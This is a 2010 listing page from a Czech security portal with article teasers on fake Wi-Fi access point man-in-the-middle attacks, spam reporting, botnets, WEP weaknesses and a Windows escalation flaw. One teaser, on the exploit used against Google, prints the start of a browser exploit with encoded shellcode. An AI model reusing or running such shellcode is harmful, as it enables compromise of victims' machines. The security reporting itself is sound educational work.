Navigace

Oblíbený obsah

Google hacking... (profesionalne) (59,854)
Hesla ve Windows 2000/XP (49,403)
WiFi sítě a jejich slabiny (45,399)
TOR (The Onion Router) - systém pro vysoce anonymní a šifrovaný přístup k Internetu (42,650)
SQL Injection (33,219)
Lamer FAQ (33,055)
Nootropika - palivo pro přetaktované mozky hackerů (29,856)

další

Security-Portal.cz [newsletter]

Buďte informováni o novinkách!

Předchozí novinky

Kdo je nový

kastanek
Bubak75
doriangray
jerrx
Alexej

Nejnovější obrázek

Kdo je online

Momentálně je online 0 uživatelů a 11 hostů.

Tagy

více tagů

Security

Články věnující se bezpečnosti IS

Fake AP s OpenBSD

Vložil/a Merlyn, 4 Červen, 2010 - 09:58

S pomocí falešného wifi access pointu je možné provést Man in the Middle útok, při kterém útočník nastaví svůj vlastní access point tak, aby vypadal jako access point, na kterém je přihlášen, nebo na který se chystá přihlásit oběť. Počítač oběti se automaticky připojí k AP s větším signálem. Je tedy důležité, aby útočník byl buď blízko oběti nebo měl výkonnou anténu, která přebije anténu správného AP.

Datové schránky, zase špatně

Vložil/a cm3l1k1, 11 Květen, 2010 - 09:08

Dnes mi přišlo na e-mail oznámení týkající se nové zprávy v mé datové schránce. Nutno podotknout, že musím mít dvě datové schránky. Jednu jakožto má osoba a druhou jakožtá já-podnikající osoba. Neptejte se proč, nikdo to neví/nechápe. Když e-mail přišel, byl jsem nucen se přihlásit do obou účtů, protože v těle emailu se nepíše, zda zpráva patří vám nebo vám-podnikateli. A to byl jen začátek...

Jak a kde nahlásit spam českých firem?

Vložil/a cm3l1k1, 3 Květen, 2010 - 13:20

Určitě vám také několikrát do měsíce přijde "obchodní sdělení" od firmy, kterou neznáte a nemáte s ní nic společného. Mně už s podobnými alibisty došla trpělivost, a rozhodl jsem se, že od teď budu vše hlásit na ÚOOÚ (Úřad pro ochranu osobních údajů).
V tomto článku bych všem chtěl úkázat, jak postupovat a co je potřeba ověřit/zjistit.

Problém s boty je horší, než si většina lidí myslí

Vložil/a IDC CEMA, 29 Březen, 2010 - 15:03

Rozhovor s Craigem Schillerem, bezpečnostním ředitelem Portlandské státní univerzity, keynote řečníkem na konferenci IDC IT Security Roadshow 2010.

Craig Schiller je diplomovaný bezpečnostní odborník informačních systémů se zaměřením na řízení bezpečnosti a bezpečnostní architekturu. V počítačovém průmyslu působí již 28 let, z toho 8 let jako odborník na informační bezpečnost.

Web Security Dojo

Vložil/a cm3l1k1, 26 Únor, 2010 - 17:36

Web Security Dojo is a turnkey web application security lab with tools, targets, and training materials built into a Virtual Machine(VM). It is ideal for both self-instruction and training classes since everything is pre-configured and no external network connection is needed. All tools and targets are configured to use non-conflicting ports and a Firefox proxy switcher is set up to match.

Exploit použitý k útoku na korporátní síť Googlu

Vložil/a cm3l1k1, 28 Leden, 2010 - 17:48

UPDATE

<html><script>

var sc = unescape("

%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805

Chyba zneužitelná od Windows NT 3.1 až po Windows 7 (Ring 0 Escalation Vulnerability)

Vložil/a cm3l1k1, 21 Leden, 2010 - 13:58

Na Internetu se objevil exploit umožňující eskalaci oprávnění díky kódu, který je ve Windows od roku 1993.

Pražské Science Café: 9. února o šifrách mistrů kryptologů

Vložil/a cm3l1k1, 19 Leden, 2010 - 15:14

Únorové Science Café v pražské kavárně Potrvá (Srbská 2, Praha 6) se bude věnovat kryptologii a šifrování.

Bezpečnost a Hacking WiFi (802.11) - 3. WEP

Vložil/a matej, 22 Prosinec, 2009 - 17:34

WEP (Wired Equivalency Protection)

Protokol na zabezpečenie WLAN definovaný v prvom IEEE 802.11 štandarde [3] sa nazýva WEP – Wired equivalent privacy. Bol vymyslený na poskytnutie bezpečnosti úrovne drôtových sietí, ale kvôli slabému kryptografickému základu tomu tak nie je.